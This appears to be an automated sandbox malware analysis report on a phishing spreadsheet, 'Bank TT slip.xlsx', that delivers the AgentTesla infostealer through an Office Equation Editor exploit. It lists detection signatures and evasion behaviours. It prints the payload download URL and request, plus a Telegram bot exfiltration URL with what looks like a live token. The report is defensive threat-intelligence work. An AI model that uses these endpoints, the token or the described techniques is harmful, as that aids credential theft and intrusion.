Windows Analysis Report
Bank TT slip.xlsx

Overview

General Information

Sample Name: Bank TT slip.xlsx
Analysis ID: 626166
MD5: 2391e6aa319cba9248661674ac5f2105
SHA1: bbdb700fd74488cc9f3f3e4d66de6b1321ee94b0
SHA256: 18fa3e8547f1b76b8a53b1169c4b3ed78f1a3efb77163e0698ae3b1faf7efb71

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Allocates memory in foreign processes
Injects a PE file into a foreign process
Shellcode detected
Yara detected Generic Downloader
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: 5.0.RegSvcs.exe.400000.4.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1295185895", "Chat URL": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument"}
Source: vbc.exe.2404.4.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}
Source: Bank TT slip.xlsx Metadefender: Detection: 20%
Source: Bank TT slip.xlsx ReversingLabs: Detection: 31%
Source: http://172.245.27.27/SOA.exe Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exeK Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeX Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exehhC: Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exej Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeB Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe ReversingLabs: Detection: 46%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 46%
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe Joe Sandbox ML: detected
Source: 5.0.RegSvcs.exe.400000.4.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.1.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.2.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.3.unpack Avira: Label: TR/Spy.Gen8

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 172.245.27.27 Port: 80
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036805F7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680658 ShellExecuteExW,ExitProcess, 2_2_03680658
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680592 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03680592
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036804ED ExitProcess, 2_2_036804ED
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680676 ExitProcess, 2_2_03680676
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680641 ShellExecuteExW,ExitProcess, 2_2_03680641
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036805AC URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036805AC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680522 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03680522
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03680506 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03680506
Source: global traffic DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 60MB

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View IP Address: 172.245.27.27
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:58:18 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.28Last-Modified: Thu, 12 May 2022 04:27:00 GMTETag: "cb600-5dec8f8138359"Accept-Ranges: bytesContent-Length: 833024Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: GET /SOA.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.27.27Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Http://172.245.27.27/SOA.exeK
Source: EQNEDT32.EXE, 00000002.00000002.962678277.0000000003680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Http://172.245.27.27/SOA.exej
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: EQNEDT32.EXE, 00000002.00000002.962279454.0000000000320000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exe
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exeB
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exeX
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.27.27/SOA.exehhC:
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bLHfhV.com
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentdocument-----
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18D80E7.png
Source: unknown DNS traffic detected: queries for: api.telegram.org

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: 5.0.RegSvcs.exe.400000.4.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.1.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.2.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.0.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.2.RegSvcs.exe.400000.0.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.3.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs Large array initialization: .cctor: array initializer size 12054
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EB070 4_2_002EB070
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA8F8 4_2_002EA8F8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9910 4_2_002E9910
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC970 4_2_002EC970
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EF14E 4_2_002EF14E
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EBA80 4_2_002EBA80
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5440 4_2_002E5440
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E8740 4_2_002E8740
Source: C:\Users\Public\vbc.exe Code function: 4_2_002ED808 4_2_002ED808
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC959 4_2_002EC959
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EF222 4_2_002EF222
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9A04 4_2_002E9A04
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEA69 4_2_002EEA69
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEA78 4_2_002EEA78
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9AB3 4_2_002E9AB3
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9A98 4_2_002E9A98
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EE420 4_2_002EE420
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5430 4_2_002E5430
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EE410 4_2_002EE410
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EECA2 4_2_002EECA2
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EECB0 4_2_002EECB0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEF4A 4_2_002EEF4A
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EEF58 4_2_002EEF58
Source: C:\Users\Public\vbc.exe Code function: 4_2_002ED7F9 4_2_002ED7F9
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C64DF 4_2_007C64DF
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C8DDD 4_2_007C8DDD
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C3EF0 4_2_007C3EF0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C43BF 4_2_007C43BF
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C0048 4_2_007C0048
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C3010 4_2_007C3010
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6D78 4_2_007C6D78
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C4D79 4_2_007C4D79
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6134 4_2_007C6134
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6D91 4_2_007C6D91
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C4D88 4_2_007C4D88
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6E1A 4_2_007C6E1A
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C3610 4_2_007C3610
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6B78 4_2_007C6B78
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C6771 4_2_007C6771
Source: C:\Users\Public\vbc.exe Code function: 4_2_007C7751 4_2_007C7751
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E178A 4_2_002E178A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 5_2_00286048 5_2_00286048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe